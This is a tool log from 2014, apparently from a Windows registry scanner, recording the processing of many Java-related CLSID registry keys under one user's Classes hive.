[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-FFFF-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.171] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0016-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0016-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0016-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0017-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0017-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0017-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0018-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0018-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0018-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0019-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0019-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0019-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0020-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0020-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0020-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0021-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.186] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0021-ABCDEFFEDCBB}]
